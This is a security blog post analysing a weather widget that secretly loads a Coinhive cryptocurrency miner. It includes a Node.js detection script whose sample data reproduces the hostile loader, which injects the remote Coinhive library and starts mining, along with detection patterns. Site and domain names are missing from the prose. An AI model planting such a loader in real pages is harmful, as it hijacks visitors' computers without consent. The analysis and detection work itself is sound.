
What’s Hiding in Your Website’s Third-Party Widgets?

by Dec 28, 2017


If you visit, you may notice one of two things. Either the fans in your computer start spinning very fast and making a lot of noise, or your antivirus (hopefully) pops a friendly alert that something malicious is going on in your browser. Why? Because unsuspecting visitors to this site are being exposed to a *drum roll* cryptocurrency miner!

Now, isn’t a fake company, and the webmaster isn’t a malicious actor. So how is this possible? Was defaced? Actually, the problem lies in a small third-party weather widget embedded on the site.

Firing up Burp Suite, we can see the requests the page makes through our proxy. The most recent request goes to a subdomain on, which is a glaring problem, since I don’t remember opting in to use that service. We can look at the previous request to get some insight into where this is coming from.

The weather widget calls back to for local weather information, but it also sources an additional JavaScript file, twantu.js, and then calls the function RunAd(). Let’s look at some source code!

Ah, well, of course it’s minified, because the last thing you want is for your cryptocurrency-mining bootstrap script to take up more space than necessary.

Beautified, that’s much better. Now we can clearly see that twantu.js sources a JavaScript file from Coinhive and starts a miner using the referrer and a randomly generated key.
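As an added illustration (not code from the original post, and not the actual twantu.js, which is not reproduced on this page), the following Node.js script walks a page the way the proxy view above does: it lists the scripts a page sources, follows each one, and flags the indicators that gave this widget away, namely a reference to a Coinhive host, a CoinHive.Anonymous constructor, and a .start() call. The page and script bodies are constructed samples; widget.example and the site key are placeholders, and the loader body only approximates the behaviour the post describes.

```javascript
// Added example (not code from the original post): a small static scanner for
// the loader pattern described above. The page and scripts below are
// constructed stand-ins; the widget host and site key are placeholders, and
// the "twantu.js" body is an approximation of the behaviour the post
// describes, not the real file.

const MINER_HOSTS = ['coinhive.com']; // extend with other known mining-library hosts

// Pull src attributes out of <script> tags in HTML (or in a script that writes HTML).
function scriptSources(source) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const out = [];
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[1]);
  return out;
}

// Resolve relative and protocol-relative URLs against a placeholder base.
function toAbsolute(src, base = 'https://site.example/') {
  try { return new URL(src, base).href; } catch (e) { return null; }
}

// True when the script host is a known miner host or a subdomain of one.
function hostIsMiner(src) {
  const abs = toAbsolute(src);
  if (abs === null) return false;
  const host = new URL(abs).hostname.toLowerCase();
  return MINER_HOSTS.some(h => host === h || host.endsWith('.' + h));
}

// Text indicators. The first two are strong on their own; '.start(' is weak
// and only meaningful alongside a host reference or constructor.
const INDICATORS = [
  { indicator: 'miner-host-reference', re: /(?:https?:)?\/\/(?:[a-z0-9-]+\.)*coinhive\.com\//i },
  { indicator: 'coinhive-constructor', re: /new\s+CoinHive\.(?:Anonymous|User|Token)\s*\(/ },
  { indicator: 'miner-start', re: /\.start\s*\(/ },
];

function findMinerIndicators(source) {
  const hits = [];
  for (const src of scriptSources(source)) {
    if (hostIsMiner(src)) hits.push({ indicator: 'miner-library-src', detail: src });
  }
  for (const { indicator, re } of INDICATORS) {
    const m = re.exec(source);
    if (m) hits.push({ indicator, detail: m[0] });
  }
  return hits;
}

// Follow the chain page -> widget script -> whatever that script names, the
// way the proxy view in the post does. fetchScript(url) returns the script
// body or null; offline here it reads from a constructed map.
function scanPage(html, fetchScript) {
  const findings = [];
  const seen = new Set();
  const queue = [{ at: '(page)', source: html }];
  while (queue.length > 0) {
    const { at, source } = queue.shift();
    for (const hit of findMinerIndicators(source)) findings.push({ at, ...hit });
    for (const src of scriptSources(source)) {
      const abs = toAbsolute(src);
      if (abs === null || seen.has(abs)) continue;
      seen.add(abs);
      const body = fetchScript(abs);
      if (body !== null) queue.push({ at: abs, source: body });
    }
  }
  return findings;
}

// Constructed sample: a page embedding a third-party weather widget.
const SAMPLE_PAGE = `<!doctype html>
<div id="weather-box"></div>
<script src="https://widget.example/static/js/weather.js"></script>
<script src="https://widget.example/static/js/twantu.js"></script>
<script>RunAd();</script>`;

// Constructed script bodies keyed by URL (stands in for fetching them).
const SAMPLE_SCRIPTS = {
  'https://widget.example/static/js/weather.js':
    "document.getElementById('weather-box').textContent = 'Sunny, 72F';",
  // Approximation of the deobfuscated loader; the real key and referrer were
  // supplied server-side, so a fixed placeholder key is used here.
  'https://widget.example/static/js/twantu.js':
    "function RunAd(){var s=document.createElement('script');" +
    "s.src='https://coinhive.com/lib/coinhive.min.js';" +
    "s.onload=function(){var m=new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');m.start();};" +
    "document.head.appendChild(s);}",
};

function fetchSample(url) {
  return Object.prototype.hasOwnProperty.call(SAMPLE_SCRIPTS, url) ? SAMPLE_SCRIPTS[url] : null;
}

console.log(JSON.stringify(scanPage(SAMPLE_PAGE, fetchSample), null, 2));
```

Run it with node. Only the twantu.js hop produces findings; the weather script and the embedding page come back clean, which is the point: nothing in the site's own HTML mentions a miner, so a scanner that stops at the first hop would miss it.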

Obviously, is at fault for using an untrusted weather plugin, but is a legitimate service that was breached, or is it the malicious actor? The twantu.js file is hosted on itself under /static/js/twantu.js, so it’s possible that an attacker gained access to the file system, uploaded this file, and modified the weather widget to source twantu.js. The problem with that theory, however, is that the referrer and the random key aren’t generated client-side by JavaScript; they’re generated server-side by the widget’s Express application. A malicious actor would first need access to the application framework, which means having control over the web server, not just the ability to drop a file into a static directory.

A quick WHOIS for

Aaand a quick Google search:

Handsome-looking guy! Unfortunately, I doubt Mr. Hassan created a weather widget that mines cryptocurrency. ¯\_(ツ)_/¯

The next question is, “How many sites are using this widget?” Well, this is where things get tricky. We can’t Google Dork our way to the answer, because the widget reference lives in each page’s HTML source, not in the text that search engines index. Using source-code search services like and, we can tell that about 300 websites are using this widget, but we can’t confirm most of them because the full results are behind a paywall.

What do we take from this? Don’t install or use untrusted third-party widgets or applications. Simple as that. A script you embed from someone else’s server runs with the full privileges of your page and can be changed on their end at any time, so vet it, host a reviewed copy yourself where you can, and limit what it is allowed to load. Also, if you’re using the weather widget from, then maybe it’s time to find a new one.

© 2021 RiskSense, Inc. All rights reserved.